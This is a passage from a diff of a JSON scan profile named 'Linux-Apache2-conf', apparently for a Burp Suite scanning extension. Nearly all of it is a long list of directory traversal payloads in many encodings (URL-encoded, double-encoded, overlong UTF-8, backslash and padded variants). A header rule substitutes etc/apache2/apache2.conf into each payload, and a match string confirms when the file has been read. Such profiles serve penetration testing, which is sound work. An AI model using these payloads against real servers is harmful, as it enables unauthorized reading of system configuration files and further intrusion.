5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Apache server configuration"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-Apache2-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/apache2/apache2.conf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-Apache2-conf", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + 